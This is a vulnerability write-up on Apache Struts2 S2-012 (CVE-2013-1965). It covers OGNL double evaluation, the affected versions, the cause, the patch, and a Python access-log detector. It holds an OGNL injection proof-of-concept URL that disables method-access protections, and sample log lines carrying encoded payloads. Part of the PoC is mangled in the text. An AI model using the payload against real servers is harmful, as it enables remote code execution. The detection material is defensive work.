struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution

catalog

1. Description
2. Affected Scope
3. Exploit Analysis
4. Principle Of Vulnerability
5. Patch Fix

1. Description

OGNL provides, among other features, extensive expression evaluation capabilities.
A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into a property that is afterwards used as a request parameter of a redirect address, which causes a further evaluation.
OGNL evaluation was already addressed in S2-003, S2-005 and S2-009, but since those issues involved only the parameter's name, the resulting fixes, based on whitelisting acceptable parameter names and denying evaluation of the expression contained in parameter names, turned out to close the vulnerability only partially.
The second evaluation happens when the redirect result reads the property from the value stack and uses the previously injected code as a redirect parameter.
This lets malicious users put arbitrary OGNL statements into any unsanitized String variable exposed by an action and have it evaluated as an OGNL expression, enabling method execution and execution of arbitrary methods, bypassing Struts and OGNL library protections.

2. Affected Scope

Struts Showcase App 2.0.0 - Struts Showcase App 2.3.13

3. Exploit Analysis

0x1: POC

http://localhost:8080/S2-XX/Login.action?skillName=%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false) #[email protected]@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}

Relevant Link:

http://struts.apache.org/docs/s2-012.html

4. Principle Of Vulnerability

In Struts2 an OGNL expression can be referenced with ${express} or %{express}. When an action's configuration contains ${input} or %{input} and input comes from external input, assigning %{exp} to input makes that expression evaluated a second time, which leads to arbitrary code execution.

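Because the second evaluation acts on a parameter value rather than a parameter name, a defender has to look at values. The following detector is an added example and is not part of the original post or of Struts; it URL-decodes query-string values from combined-format access lines (constructed sample lines, not real traffic) and flags those shaped like the S2-012 PoC above, i.e. containing an OGNL expression marker or one of the well-known OGNL sentinel tokens.

```python
import re
from urllib.parse import parse_qsl, unquote

# S2-012 evaluates a parameter *value* twice (once when the action field is set,
# again when the redirect result interpolates ${...}), so the name whitelists from
# S2-003/S2-005/S2-009 do not help; inspect values instead.
OGNL_EXPR = re.compile(r"[%$]\{")
OGNL_SENTINELS = ("#_memberAccess", "denyMethodExecution",
                  "allowStaticMethodAccess", "@org.apache.struts2.")

def decode_value(raw: str, rounds: int = 2) -> str:
    """Percent-decode repeatedly so a double-encoded '%{' (%2525%257B) is seen."""
    value = raw
    for _ in range(rounds):
        decoded = unquote(value)        # not unquote_plus: '+' already handled
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(url: str) -> list:
    """Return (name, value) pairs whose value looks like an OGNL expression."""
    # split on '?' by hand: a raw '#' inside the query must not be
    # treated as a URL fragment and dropped
    query = url.split("?", 1)[1] if "?" in url else ""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        v = decode_value(value)
        if OGNL_EXPR.search(v) or any(s in v for s in OGNL_SENTINELS):
            hits.append((name, v))
    return hits

def scan_access_log(lines) -> list:
    """Keep the combined-format log lines whose request carries such a value."""
    findings = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m and suspicious_params(m.group(1)):
            findings.append(line)
    return findings

# Constructed sample lines (not real traffic): a benign login, a value shaped
# like the S2-012 PoC, and a double-encoded variant.
LOG = [
    '10.0.0.5 - - [13/Nov/2024:09:41:45 +0000] "GET /S2-XX/Login.action?skillName=Java HTTP/1.1" 200 512',
    '10.0.0.9 - - [13/Nov/2024:09:42:01 +0000] "GET /S2-XX/Login.action?skillName=%25%7B(%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue) HTTP/1.1" 302 0',
    '10.0.0.9 - - [13/Nov/2024:09:42:05 +0000] "GET /S2-XX/Login.action?skillName=%2525%257B(1%252B1)%257D HTTP/1.1" 302 0',
]
```

`scan_access_log(LOG)` returns the second and third lines only; a `%{` hit in a value is worth an alert on any Struts deployment still in the affected range.
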
5. Patch Fix

0x1: upgrade struts2

It is strongly recommended to upgrade to Struts 2.3.14.1, which contains the corrected OGNL and XWork library.
//The OGNLUtil class was changed to deny eval expressions by default.

Relevant Link:

Copyright (c) 2015 Little5ann All rights reserved

Time: 2024-11-13 09:41:45
